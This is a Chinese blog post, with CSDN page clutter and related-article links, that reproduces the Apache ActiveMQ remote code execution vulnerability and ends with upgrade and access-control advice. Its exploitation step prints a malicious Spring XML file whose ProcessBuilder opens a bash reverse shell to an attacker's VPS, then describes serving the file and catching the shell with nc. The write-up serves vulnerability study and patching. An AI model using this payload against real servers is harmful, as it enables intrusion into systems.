Apache ActiveMQ RCE漏洞复现

最新推荐文章于 2024-07-17 23:51:10 发布
最新推荐文章于 2024-07-17 23:51:10 发布
阅读量892 收藏 9
点赞数 8
文章标签: apache activemq web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45802999/article/details/135520704
版权

Apache ActiveMQ RCE漏洞复现

1、 产品简介

ActiveMQ是一种开源的基于JMS(Java Message Servie)规范的一种消息中间件的实现,ActiveMQ的设计目标是提供标准的,面向消息的,能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品,最流行的,能力强劲的开源消息总线。

2、 漏洞概述

Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。

3、 影响范围

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

4、 漏洞复现

PoC地址:https://github.com/trganda/ActiveMQ-RCE

把项目Get到本地,导入IDEA中运行
在这里插入图片描述
因为我电脑上JDK安装的是1.8.0,直接运行会发现报错

所以在此处安装JDK11:
在这里插入图片描述

5、 漏洞利用

准备好恶意文件:rec.xml,将其上传到自己的VPS,其中将your-ip改成自己vps地址。

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

 xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

 <constructor-arg>

 <list>

 <value>bash</value>

 <value>-c</value>

 <value><![CDATA[bash -i >& /dev/tcp/your-ip/6666 0>&1]]></value>

 </list>

 </constructor-arg>

 </bean>

</beans>

修改Main.java以下两处,一个是目标地址,一个是恶意文件地址
在这里插入图片描述
在vps中使用python开启http服务
在这里插入图片描述
再使用nc实现监听
在这里插入图片描述
接着运行Main.java
在这里插入图片描述
成功反弹shell,ls查看拿到flag
在这里插入图片描述

6、 修复建议

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

升级修复:

Apache ActiveMQ >= 5.18.3

Apache ActiveMQ >= 5.17.6

Apache ActiveMQ >= 5.16.7

Apache ActiveMQ >= 5.15.16

别JUAN我
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache ActiveMQ RCE漏洞复现(CVE-2023-46604)
0xSec
10-26 8021
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。
Apache ActiveMQ (版本 < 5.18.3) (CVE-2023-46604)RCE修复方案/缓解方案
士心的博客
10-31 3265
CVE-2023-46604
探索Apache ActiveMQ RCE:一个强大的安全研究工具
gitblog_00069的博客
04-08 979
探索Apache ActiveMQ RCE:一个强大的安全研究工具 项目地址:https://gitcode.com/sincere9/Apache-ActiveMQ-RCE 在这个数字化的时代,消息中间件是构建高效、可扩展系统的关键组件。Apache ActiveMQ作为一款开源的消息代理,广泛应用于企业级应用中。然而,与所有软件一样,它也可能存在安全隐患。这就是为什么Apache Activ...
探索Apache ActiveMQ安全边界:ActiveMQ-RCE工具深度解析
gitblog_00081的博客
06-01 668
探索Apache ActiveMQ安全边界:ActiveMQ-RCE工具深度解析 项目地址:https://gitcode.com/X1r0z/ActiveMQ-RCE安全研究与攻防对抗的前沿阵地,每一个新发现的漏洞都是对技术边界的一次挑战。今天,我们聚焦于一个名为ActiveMQ-RCE的开源工具,它专为应对近期曝光的严重安全漏洞CVE-2023-46604而生,是Go语言的杰作。本文将全...
ActiveMQ反序列化RCE漏洞复现(CVE-2023-46604)
柠檬i的博客
01-13 3371
Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。首先,启动一个HTTP反连服务器,其中包含我们的。修改xml文件为反弹shell命令。
ActiveMQ反序列化漏洞复现(CVE-2015-5254)
m0_49025459的博客
10-31 944
这里复现的靶场使用的是vulhub搭建的,过多的我就不赘述了,直接启动靶场,启动正确我们访问IP(靶场IP):8161这里以192.168.218.132:8161为例,如果出现下图场景,则证明靶场搭建成。
apache-activemq-5.16.5
12-27
Apache ActiveMQ是业界广泛使用的开源消息中间件,它基于Java消息服务(JMS)标准,提供了高度可扩展、可靠的异步通信能力。标题"apache-activemq-5.16.5"指的是该软件的一个特定版本,即5.16.5版本,通常每个新版本...
apache-activemq-5.17.3
12-27
Apache ActiveMQ是开源的、基于Java消息服务(JMS)的应用服务器,它是Apache软件基金会的一部分。这个名为"apache-activemq-5.17.3"的压缩包包含了ActiveMQ的5.17.3版本,这是一个稳定且功能丰富的发布版本。在深入...
Apache activemq 5.15.5
10-28
阿帕奇的消息队列服务 品
apache-activemq-5.16.6-bin.zip
12-26
Apache ActiveMQ是世界上最流行的开源消息代理和队列服务器,它基于Java消息服务(JMS)规范,提供高可用性、可扩展性和强大的消息传递功能。这个"apache-activemq-5.16.6-bin.zip"文件包含了ActiveMQ的最新稳定版本...
apache-activemq-5.15.9.rar
05-29
Apache ActiveMQApache软件基金会开发的一个开源消息中间件,它基于Java Message Service (JMS) 规范,提供高效、可靠的消息传递服务。在本文中,我们将深入探讨Apache ActiveMQ,特别是针对“apache-activemq-...
ActiveMQ 反序列化RCE漏洞(CVE-2023-46604)
最新发布
zneVue
07-17 452
Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。
3000 台 Apache ActiveMQ 服务器易受 RCE 攻击
网络研究观
11-04 4742
超过三千个暴露在互联网上的 Apache ActiveMQ 服务器容易受到最近披露的关键远程代码执行 (RCE) 漏洞的影响。
Active MQ 任意文件写入漏洞/远程代码执行漏洞(CVE-2016-3088)
初岄的博客
09-13 1315
Active MQ 任意文件写入漏洞/远程代码执行漏洞(CVE-2016-3088)
activemq原理_CVE20163088(ActiveMQ 代码执行)
weixin_39955418的博客
11-27 182
(ActiveMQ)ActiveMQ 简介 Apache ActiveMQApache软件基金会所研发的开放源码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。漏洞描述漏洞位置位于ActiveMQ中的FileServer服务中,允许通过PUT请求方法写入任意文件,但不进行解析,并附带着支持MOV...
ActiveMQ高级特性
qq_56224861的博客
04-21 176
引入消息队列之后该如何保证其高可用性 zookeeper+replicated-levelDB-Store的主从集群 异步投递 Async Sends 对于一个Slow Consumer,使用同步发送消息可能会出现Producer堵塞等情况,慢消费者适合使用异步发送--------activeMQConnectionFactory.setUseAsyncSend(true) ActiveMQ默认使用异步发送的模式:除非明确指定使用同步发送的方式或者在未使用事务的前提下发送持久化的消息,这两种情况都是同
CVE-2023-46604- RCE漏洞复现
2301_80115097的博客
11-16 3135
执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值